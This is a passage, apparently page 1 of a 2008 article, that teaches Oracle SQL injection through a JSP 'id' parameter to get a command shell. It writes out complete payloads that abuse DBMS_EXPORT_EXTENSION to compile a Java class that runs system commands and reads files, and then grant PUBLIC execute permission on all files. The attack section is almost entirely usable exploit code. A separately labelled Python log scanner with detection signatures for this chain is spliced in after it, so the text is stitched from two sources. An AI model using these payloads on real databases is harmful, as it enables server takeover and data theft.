Sharp Oracle injection technique
  Add date: 10/21/2008   Publishing date: 10/21/2008   Hits: 39
Page 1 of 4.
This article introduces a method of obtaining a cmdshell on the host directly through Oracle injection on the web.
  The statements below are shown as they would be executed in SQL*Plus. When injecting over the web, the statement select SYS.DBMS_EXPORT_EXTENSION ..... is rewritten into the form
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION .....)
  (the 'a'|| concatenation is there so that the condition evaluates to true).
  The statement is rather long, so it may have to be submitted via POST.
  The steps are as follows:
  1. Create the package
  By injecting through the SYS.DBMS_EXPORT_EXTENSION function, create a Java source LinxUtil in Oracle containing two functions: runCMD, which executes system commands, and readFile, which reads a file:
  /xxx.jsp?id=1 and '1'<>'a'||(
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO', 'BAR', 'DBMS_OUTPUT".PUT(:P1); EXECUTE IMMEDIATE '' DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''
  create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object { public static String runCMD(String args) { try { BufferedReader myReader = new BufferedReader(
  new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream())); String stemp, str = ""; while ((stemp = myReader.readLine()) != null) str += stemp + "\n"; myReader.close(); return str; } catch (Exception e) { return e.toString(); } } public static String readFile(String filename) { try { BufferedReader myReader = new BufferedReader(new FileReader(filename)); String stemp, str = ""; while ((stemp = myReader.readLine()) != null) str += stemp + "\n"; myReader.close(); return str; } catch (Exception e) { return e.toString(); } }
  } ''''; END; ''; END; --', 'SYS', 0, '1', 0) from dual
  )
  ------------------------
  If the URL length is limited, the readFile() function block can be removed, i.e.:
  /xxx.jsp?id=1 and '1'<>'a'||(
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO', 'BAR', 'DBMS_OUTPUT".PUT(:P1); EXECUTE IMMEDIATE '' DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''
  create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object { public static String runCMD(String args) { try { BufferedReader myReader = new BufferedReader(
  new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream())); String stemp, str = ""; while ((stemp = myReader.readLine()) != null) str += stemp + "\n"; myReader.close(); return str; } catch (Exception e) { return e.toString(); } }
  } ''''; END; ''; END; --', 'SYS', 0, '1', 0) from dual
  )
  At the same time, remove the statements in the later steps that handle readFile().
  ------------------------------
  2. Grant Java permissions
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO', 'BAR', 'DBMS_OUTPUT".PUT(:P1); EXECUTE IMMEDIATE '' DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE '''' begin dbms_java.grant_permission(''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute''''''''); end; ''''; END; ''; END; --', 'SYS', 0, '1', 0) from dual
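As an added defender-side example (not part of the original article), the following Python script scans web-server access log lines for the markers of the injection chain shown above: the DBMS_EXPORT_EXTENSION call, the autonomous-transaction wrapper, the Java source creation and the dbms_java.grant_permission call. It URL-decodes and normalizes each request before matching; the log lines, IP addresses and timestamps are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Injection-chain markers, matched after URL decoding and whitespace collapse (any case).
SIGNATURES = {name: re.compile(pat, re.I) for name, pat in {
    "dbms_export_extension": r"dbms_export_extension\s*\.\s*get_domain_index_tables",
    "autonomous_transaction": r"pragma\s+autonomous_transaction",
    "java_source_create": r"create\s+or\s+replace\s+(and\s+compile\s+)?java\s+source",
    "java_grant_permission": r"dbms_java\s*\.\s*grant_permission",
}.items()}

# Common Log Format: ip ident user [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def normalize(text):
    """URL-decode twice (catches double encoding) and collapse whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(text)))

def classify(path):
    """Names of the signatures present in one request path + query string."""
    decoded = normalize(path)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan(lines):
    """One alert per log line whose request matches at least one signature."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:  # not CLF: skip rather than crash on odd lines
            continue
        hits = classify(m.group("path"))
        if hits:
            alerts.append({"ip": m.group("ip"), "ts": m.group("ts"),
                           "status": m.group("status"), "hits": hits})
    return alerts

# Constructed sample lines (not real traffic): a clean request, a URL-encoded injection,
# a double-encoded mixed-case variant, and a benign request containing "export_extension".
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Oct/2008:10:00:00 +0800] "GET /xxx.jsp?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [21/Oct/2008:10:00:07 +0800] "GET /xxx.jsp?id=1%20and%20%271%27%3C%3E%27a%27%7C%7C(select%20SYS.'
    'DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(%27FOO%27,%27BAR%27,%27DBMS_OUTPUT%22.PUT(:P1);EXECUTE%20IMMEDIATE%20%27%27'
    'DECLARE%20PRAGMA%20AUTONOMOUS_TRANSACTION;BEGIN%20EXECUTE%20IMMEDIATE%20%27%27%27%27create%20or%20replace%20and%20compile%20java%20source HTTP/1.1" 500 0',
    '10.0.0.9 - - [21/Oct/2008:10:02:41 +0800] "GET /xxx.jsp?id=1+and+%271%27%3C%3E%27a%27%7C%7C(select+sys.'
    'DbMs_ExPoRt_ExTeNsIoN%2520.%2520get_domain_index_tables(%27FOO%27,%27BAR%27,%27DBMS_OUTPUT%22.PUT(:P1);'
    'EXECUTE+IMMEDIATE+%27%27begin+dbms_java.grant_permission(%27%27%27%27PUBLIC%27%27%27%27 HTTP/1.1" 200 512',
    '10.0.0.7 - - [21/Oct/2008:10:05:12 +0800] "GET /report.jsp?action=export_extension&id=7 HTTP/1.1" 200 2048',
]
```

Because the article notes the payload may have to be sent via POST, run classify() over request bodies captured by the application or a WAF as well, since an access log only records the query string. Patching the database and using parameterized queries in the JSP remove the root cause; this detection is for spotting attempts against instances that are not yet fixed.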

 